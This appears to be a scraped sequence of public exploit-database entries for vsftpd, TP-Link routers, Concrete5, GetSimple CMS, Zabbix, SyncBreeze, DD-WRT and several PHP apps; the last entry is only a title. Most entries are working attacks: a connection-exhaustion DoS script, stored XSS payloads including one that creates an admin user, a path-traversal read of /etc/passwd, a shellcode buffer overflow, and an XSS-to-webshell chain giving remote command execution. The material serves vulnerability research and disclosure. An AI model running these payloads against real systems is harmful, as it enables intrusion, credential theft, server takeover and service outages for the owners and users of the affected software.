-
vsftpd 3.0.3 - Remote Denial of Service
# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
# Date: 22-03-2021
# Exploit Author: xynmaps
# Vendor Homepage: https://security.appspot.com/vsftpd.html
# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
# Version: 3.0.3
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
VSFTPD only lets a certain amount of connections be made to the server, so, by
repeatedly making new connections to the server, you can block other legitimate
users from making a connection to the server, if the connections/ip aren't limited.
(if it's limited, just run this script from different proxies using proxychains,
and it will work)

Reviewer notes (defender's view):
  - This is connection-slot exhaustion, not a flaw in vsftpd: each worker
    starts an external ``ftp`` client that holds one idle control connection.
  - The script's own caveat is the mitigation: vsftpd's per-source cap
    (max_per_ip) bounds a single-source run and max_clients bounds the total;
    a connection-rate limit at the firewall covers the multi-source case.
  - Detection: a burst of TCP connections to port 21 from one source that
    never authenticate and sit idle.
  - The script is Python 2 (print statements).  Its scheduling functions have
    control-flow defects, noted inline, so as written it appears to produce a
    single burst of workers rather than sustained pressure.
"""
import socket
import sys
import threading
import subprocess
import time
# ASCII-art banner printed at start-up (layout reconstructed; the original
# whitespace was lost in extraction).
banner = """
 ._________________.
 |     VS-FTPD     |
 |      D o S      |
 |_________________|
 |By XYN/DUMP/NSKB3|
 |_|_____________|_|
 |_|_|_|_____|_|_|_|
 |_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
    # Liveness probe: one TCP connect plus a banner read, 10 s timeout.
    # Exits the whole process if the connect fails; on that path the socket
    # is not closed.  The banner (`response`) is read but never used.
    s = socket.socket()
    s.settimeout(10)
    try:
        s.connect((t, p))
        response = s.recv(65535)
        s.close()
        return 0
    except socket.error:
        print("Port {} is not open, please specify a port that is open.".format(p))
        sys.exit()
def attack(targ, po, id):
    # One worker = one external `ftp` client process started through the
    # shell (shell=True) from a string built out of the operator's argv.
    # The child is never waited on or terminated here, so it keeps its
    # control connection until it exits on its own.  `id` is only used by
    # the commented-out print.
    try:
        subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        #print("Worker {} running".format(id))
    except OSError:
        pass
def main():
    # Entry point: argv parsing, liveness probe, then the worker scheduler.
    # The bare excepts mean a missing or non-numeric port / count silently
    # falls back to 21 / 50 instead of reporting the error.
    global target, port, start
    print banner
    try:
        target = sys.argv[1]
    except:
        print usage
        sys.exit()
    try:
        port = int(sys.argv[2])
    except:
        port = 21
    try:
        conns = int(sys.argv[3])
    except:
        conns = 50
    print("[!] Testing if {0}:{1} is open".format(target, port))
    test(target, port)
    print("[+] Port {} open, starting attack...".format(port))
    time.sleep(2)
    print("[+] Attack started on {0}:{1}!".format(target, port))
    def loop(target, port, conns):
        # Starts the timer thread, then launches conns + 2 workers
        # (range covers 1 .. conns + 2 inclusive).  `i > conns + 2` can
        # never hold inside that range, so the join/break branch is dead.
        # The trailing `loop()` passes no arguments although `loop` takes
        # three, so it raises TypeError in this thread after the first
        # burst.  The original indentation was lost; the self-call is placed
        # at the end of the while body, the most plausible reading.
        global start
        threading.Thread(target=timer).start()
        while 1:
            for i in range(1, conns + 3):
                t = threading.Thread(target=attack, args=(target,port,i,))
                t.start()
                if i > conns + 2:
                    t.join()
                    break
            loop()
    t = threading.Thread(target=loop, args=(target, port, conns,))
    t.start()
def timer():
    # Intended as a 900 s watchdog that kills the ftp children and restarts
    # the scheduler.  `start < time.time() + 900` is always true (start was
    # just taken from time.time()), so this spins forever and the else
    # branch is unreachable.  If reached, `loop` is local to main() and not
    # in scope here as reconstructed, and the args tuple has two items where
    # `loop` takes three.
    start = time.time()
    while 1:
        if start < time.time() + float(900):
            pass
        else:
            subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            t = threading.Thread(target=loop, args=(target, port,))
            t.start()
            break
main()
-
TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)
# Exploit Title: TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated) # Date: 24-07-2020 # Exploit Author: Smriti Gaba, Kaustubh Padwad # Vendor Homepage: https://www.tp-link.com # Version: Multiple ============================================================== Unauthenticated Stored Cross-site Scripting in Multiple TP-Link Devices ============================================================== Overview ======== Products: 1. DSL and DSL Gateway 2. Access Points 3. WIFI Routers Tested Version: : Multiple versions of DSL & DSL Gateway, WIFI Routers and Access Points including: ------------------------------------------------------------------------------- Model | Firmware Version | ------------------------------------------------------------------------------- TD-W9977 | TD-W9977v1_0.1.0_0.9.1_up_boot(161123)_2016-11-23_15.36.15 | TL-WA801ND | TL-WA801NDv5_US_0.9.1_3.16_up_boot[170905-rel56404] | TL-WA801N | TL-WA801Nv6_EU_0.9.1_3.16_up_boot[200116-rel61815] | TL-WR802N | TL-WR802Nv4_US_0.9.1_3.17_up_boot[200421-rel38950] | Archer-C3150 | ArcherC3150(US)_V2_170926) | ------------------------------------------------------------------------------- Severity: Med-High About the Product: ================== * The (products from above list) are high performance WIFI Routers(Wireless AC routers), Access Points, ADSL + DSL Gateways and Routers. * Provides Configuration modes: Access Point mode, Router Mode, Range Extender mode. * Provide Ethernet and other interfaces to meet the access requirements of different devices. * It can provide high-performance functionalities, services for home users, individual users, and businesses. * Supports multiple functionalities including CWMP management, TR069 Configuration, SNMP management, Traffic statistics, etc. Description: ============ An issue was discovered, common to all the TP-Link products including WIFI Routers(Wireless AC routers), Access Points, ADSL + DSL Gateways and Routers. 
This affected TD-W9977v1, TL-WA801NDv5, TL-WA801Nv6, TL-WA802Nv5, Archer C3150v2 devices. A malicious XSS payload, if injected into the hostname of a wireless client device connected to the TP-Link device, allows remote attackers to execute unauthenticated malicious scripts because of improper validation of the hostname. Some of the pages, including dhcp.htm, networkMap.htm, dhcpClient.htm, qsEdit.htm, qsReview.htm and others, use this vulnerable hostname function (setDefaultHostname()) without sanitization and push the value of the hostname ($defaulthostname) directly to the ACT stack along with other parameters. The ACT stack is called for multiple operation ids covering LAN and WAN, and during initialisation of multiple tables (arp, dhcp, client list) across the device. For example, the ACT_SET stack for WAN_IP_CONN is called during the DHCP operation, during which the value of the vulnerable defaulthostname is assigned to the parameter X_TP_Hostname and pushed to the stack. This causes XSS at all the endpoints which display the hostname, for example: the Wireless client information table and ARP bind table such as networkMap, DHCP. Additional Information ======================== The hostname value is only validated for ASCII characters, while there is no validation for non-ASCII characters, which allows a hostname with an XSS payload, say "<script>alert('XSS')</script>", to execute. This value of the hostname is pushed to an array as plain text along with the IP address and MAC address in the initClientListTable() function, and other tables use the same value of the hostname across the device. This array is then returned to the callback function, which in turn is called from proxy.js. This data is pushed to the stack corresponding to operation: "LAN_HOST_ENTRY" (varies between firmware versions), operation id: "gl" (gl is the getList function). As the client initiates a request with operation id: "LAN_HOST_ENTRY" and oid: "gl", $dm.getList and $.act are called, which fetch the corresponding stack and send the data to the ajax call.
The crafted value of hostname is sent to the device and results in execution of payload. [Affected Component] hostName parameter inside different htm pages including DHCP, DhcpAP, ArpBind, networkMap. ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Malicious payload execution on initiating request for Wireless Client List table or DHCP html page. [Vulnerability Type] ==================== Stored Cross-site Scripting How to Reproduce: (POC): ======================== 1. Change the default hostname of wireless client by using following command (for Linux): a. vi /etc/dhcp/dhclient.conf b. Insert and change the value of hostname to xss payload "<script>alert('XSS')</script>" 2. Renew IP address by sending DHCP request to TP-Link device via following command: a. vi /etc/network/interfaces b. Add these lines: auto wlan0 iface wlan0 inet dhcp c. On Terminal run command: ifup wlan0 3. Login to the router web interface, navigate to DHCP settings or Wireless Client tab. 4. As soon as DHCP or Wireless client table is requested Xss payload executes and pops up alert box. 
Mitigation ========== --------------------------------------------------------------------------------------------------------- | Model | Firmware Version | Mitigation Comments | --------------------------------------------------------------------------------------------------------- | TL-WA801ND | TL-WA801NDv5_US_0.9.1_3.16_up_boot[170905-rel56404] | Patched | | TL-WA801N | TL-WA801Nv6_EU_0.9.1_3.16_up_boot[200116-rel61815] | Patched | | TL-WR802N | TL-WR802Nv4_US_0.9.1_3.17_up_boot[200421-rel38950] | Patched | | Archer-C3150 | ArcherC3150(US)_V2_170926) | EOL Product | | TD-W9977 | TD-W9977v1_0.1.0_0.9.1_up_boot(161123)_2016-11-23_15.36.15 | EOL Product | --------------------------------------------------------------------------------------------------------- Link for patched software version for products: 1. TL-WA801ND - https://tp-link.com/beta/2021/202101/20210120/TL-WA801NDv5_US_0.9.1_3.16_up_boot[210119-rel61453].zip 2. TL-WA801N - https://tp-link.com/beta/2021/202101/20210120/TL-WA801Nv6_EU_0.9.1_3.16_up_boot[210119-rel62190].zip 3. TL-WR802N - https://tp-link.com/beta/2021/202101/20210120/TL-WR802Nv4_US_0.9.1_3.17_up_boot[210119-rel63071].zip [Vendor of Product] TP-LINK (https://www.tp-link.com) Disclosure Timeline: =================== 24-July-2020 Discoverd the vulnerability 11-Aug-2020 Responsibly disclosed vulnerability to vendor 15-Aug-2020 Vendor Acknowledged the disclosure 17-Nov-2020 Communicated with vendor after 90 days for updates 19-Nov-2020 Vendor asked for model and version details 20-Nov-2020 Provided the required details to vendor 25-Nov-2020 Vendor provided software build to verify the issue 9-Dec-2020 Issue not fixed in the provided software. 4-Jan-2021 Asked Updates on the status of the issue. 20-Jan-2021 Vendor provided software build to verify the issue. 20-Jan-2021 Issue found fixed in the provided software. 21-Jan-2021 Requested for CVE-ID assignment 25-March-2021 CVE-ID Assigned. credits: ======== * Smriti Gaba * Kaustubh Padwad
-
Equipment Inventory System 1.0 - 'multiple' Stored XSS
# Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS # Exploit Author: Jitendra Kumar Tripathi # Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html # Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code # Version: 1 # Tested on Windows 10 + Xampp 8.0.3 Vulnerable Parameters: Item List, Employee Details, Position of Employee *Steps to reproduce:* 1: Log in with a valid username and password. 2: Navigate to http://localhost/deped/admin/item.php Add Item Payload : <script>alert(1)</script> Navigate to http://localhost/deped/admin/employee.php Add Employee Payload : <script>alert(2)</script> Once saved successfully, reload the page or navigate to any page and you will see the XSS triggered.
-
Concrete5 8.5.4 - 'name' Stored XSS
# Exploit Title: Concrete5 8.5.4 - 'name' Stored XSS # Date: 2021-01 # Exploit Author: Quadron Research Lab # Version: Concrete5 8.5.4 # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: Concrete5 CMS (https://www.concrete5.org) # CVE: CVE-2021-3111 [Suggested description] The Express Entries Dashboard in Concrete5 8.5.4 allows stored XSS via the name field of a new data object at an index.php/dashboard/express/entries/view/ URI. [Attack Vectors] When creating a new data object, the name field is not filtered. It is possible to place JavaScript code. [Stored XSS] Proof of Concept https://github.com/Quadron-Research-Lab/CVE/blob/main/CVE-2021-3111.pdf
-
Budget Management System 1.0 - 'Budget title' Stored XSS
# Exploit Title: Budget Management System 1.0 - 'Budget title' Stored XSS # Exploit Author: Jitendra Kumar Tripathi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14403/budget-management-system.html # Version: 1 # Tested on Windows 10 + Xampp 8.0.3 XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Customer Details *Steps to reproduce:* Add Budget Title Payload : <script>alert(1)</script> Reload http://localhost/Budget%20Management%20System/index.php or update the budget; the XSS will be triggered.
-
Novel Boutique House-plus 3.5.1 - Arbitrary File Download
# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download # Date: 27/03/2021 # Exploit Author: tuyiqiang # Vendor Homepage: https://xiongxyang.gitee.io/ # Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus # Version: all # Tested on: linux Vulnerable code: com/java2nb/common/controller/FileController.java @RequestMapping(value = "/download") public void fileDownload(String filePath,String fileName, HttpServletResponse resp) throws Exception { String realFilePath = jnConfig.getUploadPath() + filePath; InputStream in = new FileInputStream(realFilePath); fileName = URLEncoder.encode(fileName, "UTF-8"); resp.setHeader("Content-Disposition", "attachment;filename=" + fileName); resp.setContentLength(in.available()); OutputStream out = resp.getOutputStream(); byte[] b = new byte[1024]; int len = 0; while ((len = in.read(b)) != -1) { out.write(b, 0, len); } out.flush(); out.close(); in.close(); } Guide: 1. Log in to background management 2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd
-
SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow # Date: 03/27/2021 # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com # Vendor: https://www.syncbreeze.com/ # Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html # Version: SyncBreeze v10.1.16 x86 # Tested on: Windows 10 x64 (19042.867) # CVE: CVE-2017-15950 Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. # -*- coding: utf-8 -*- import struct # badchars #\x00\x0a\x0d\x20\x27 #\x81\x82\x83\x84\x85\x86\x87\x88 #\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90 #\x91\x92\x93\x94\x95\x96\x97\x98 #\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0 #\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8 #\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0 #\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8 #\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0 #\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8 #\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0 #\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8 #\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0 #\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8 #\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0 #\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8 #\xF9\xFA\xFB\xFC\xFD\xFE\xFF # Shellcode payload size: 432 bytes # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python shellcode = b"" shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69" shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30" shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e" shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c" shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66" shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61" shellcode += 
b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65" shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d" shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36" shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a" shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a" shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b" shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70" shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b" shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39" shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71" shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54" shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54" shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71" shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c" shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68" shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50" shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31" shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f" shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44" shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31" shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33" shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f" shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78" shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55" shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63" shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70" shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74" shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f" shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43" shellcode += b"\x30\x41\x41" # padding to crash buffer basura = struct.pack('<L', 0x41414141) * 390 # gadgets to move payload pointer into EAX GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX 
# padding to reach buffer address stored in ebp basura2 = struct.pack('<L', 0x41414141) * 56 # padding for stack pivot padding = struct.pack('<L', 0x41414141) * 4 padding2 = struct.pack('<L', 0x41414141) * 20 # stack pivot to reach an area with more space for gadgets on the stack # 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret pivot = struct.pack('<L', 0x6506491c) # final payload fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode # write payload to xml file payload = open("xplSyncBreeze.xml", "wb") payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8')) payload.write("<sync name='".encode('utf-8')) payload.write(fruta) payload.write("'>\n</sync>\n".encode('utf-8')) payload.close()
-
GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting
# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE # Exploit Author: Bobby Cooke (boku) # Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: March 29th, 2021 # CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839 # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/download/ # Version: v3.3.16 # Tested against Server Host: Windows 10 Pro + XAMPP # Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge # Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839 # Vulnerability Description: # GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket. # Exploit Description: # This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system. # Attack Chain: # 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit # 2. Admin then enters their credentials into the GetSimple CMS login portal # 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter # 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel # 5. 
The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS # 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS # 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned # 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console import sys,re,argparse,requests from urllib.parse import quote from colorama import (Fore as F, Back as B, Style as S) from time import sleep FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G') def webshell(SERVER_URL): try: WEB_SHELL = SERVER_URL getdir = {'FierceGodKick': 'echo %CD%'} r = requests.post(url=WEB_SHELL, data=getdir, verify=False) status = r.status_code cwd = re.findall(r'[CDEF].*', r.text) if cwd: cwd = cwd[0]+"> " term = SB+FG+cwd+FT print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST) while True: thought = input(term) command = {'FierceGodKick': thought} r = requests.post(WEB_SHELL, data=command, verify=False) status = r.status_code if status != 200: r.raise_for_status() response = r.text print(response) else: r.raise_for_status() except: pass def urlEncode(javascript): return quote(javascript) def genXssPayload(): XSS_PAYLOAD = '/index/javascript:' XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");' XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";' XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};' XSS_PAYLOAD += 'var user = document.forms[0][0].value;' 
XSS_PAYLOAD += 'var pass = document.forms[0][1].value;' XSS_PAYLOAD += 'var u1 = s+"admin"+s;' XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";' XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();' XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();' XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();' XSS_PAYLOAD += 'xhr1.open("POST",u1,true);' XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);' XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";' XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){' XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {' XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){' XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {' XSS_PAYLOAD += 'r=this.responseXML;' XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;' XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;' XSS_PAYLOAD += 'xhr3.open("POST",u2,true);' XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);' XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");' XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";' XSS_PAYLOAD += 'xhr3.send(params);' XSS_PAYLOAD += '}};' XSS_PAYLOAD += 'xhr2.open("GET",u2,true);' XSS_PAYLOAD += 'xhr2.responseType="document";' XSS_PAYLOAD += 'xhr2.send();' XSS_PAYLOAD += '}};' XSS_PAYLOAD += 'xhr1.send(params);' XSS_PAYLOAD += '%2f%2f' return XSS_PAYLOAD def argsetup(): about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. 
When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST parser = argparse.ArgumentParser(description=about) parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site') args = parser.parse_args() return args if __name__ == "__main__": print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB) print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT) print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST) args = argsetup() RHOST = args.TargetSite WEBAPP_URL = RHOST+'/admin/' WEBAPP_URL = WEBAPP_URL+'index.php' PAYLOAD = genXssPayload() ENCODED_PAYLOAD = urlEncode(PAYLOAD) print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST) print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST) sleep(1) print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..') while True: sleep(1) webshell(RHOST)
-
Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting # Date: 3/30/2021 # Exploit Author: cmOs # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.9 # Tested on Ubuntu 20.04 Step 1: Log in to the dashboard using the Administrator account Step 2: Go to Listeners > Summary > Actions (View) > Edit Step 3: Inject XSS_Payload to "Notes" parameter Step 4: Graceful Restart Step 5: Trigger XSS when Administrator click on Default Icon [POC] POST /view/confMgr.php HTTP/1.1 Host: 127.0.0.1:7080 Connection: close Content-Length: 163 sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99" Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://127.0.0.1:7080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://127.0.0.1:7080/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6; litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D; LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D name=Default&ip=ANY&port=8088&reusePort=&secure=0¬e=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257
-
Zabbix 3.4.7 - Stored XSS
# Exploit Title: Zabbix 3.4.7 - Stored XSS # Date: 30-03-2021 # Exploit Author: Radmil Gazizov # Vendor Homepage: https://www.zabbix.com/ # Software Link: https://www.zabbix.com/rn/rn3.4.7 # Version: 3.4.7 # Tested on: Linux # Reference - https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt 1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382) 2- Create a new dashboard 3- Add a new widget => Type: Map navigation tree 4- Paste into the "Name" parameter: <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});"> 5- Click the "Add" button
-
DD-WRT 45723 - UPNP Buffer Overflow (PoC)
# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC) # Date: 24.03.2021 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://dd-wrt.com/ # Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/ # Version: 45723 or prior # Tested on: TP-Link Archer C7 # https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/ import socket target_ip = "192.168.2.1" # IP Address of Target off = "D"*164 ret_addr = "AAAA" payload = off + ret_addr packet = \ 'M-SEARCH * HTTP/1.1\r\n' \ 'HOST:239.255.255.250:1900\r\n' \ 'ST:uuid:'+payload+'\r\n' \ 'MX:2\r\n' \ 'MAN:"ssdp:discover"\r\n' \ '\r\n' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) s.sendto(packet, (target_ip, 1900) )
-
CourseMS 2.1 - 'name' Stored XSS
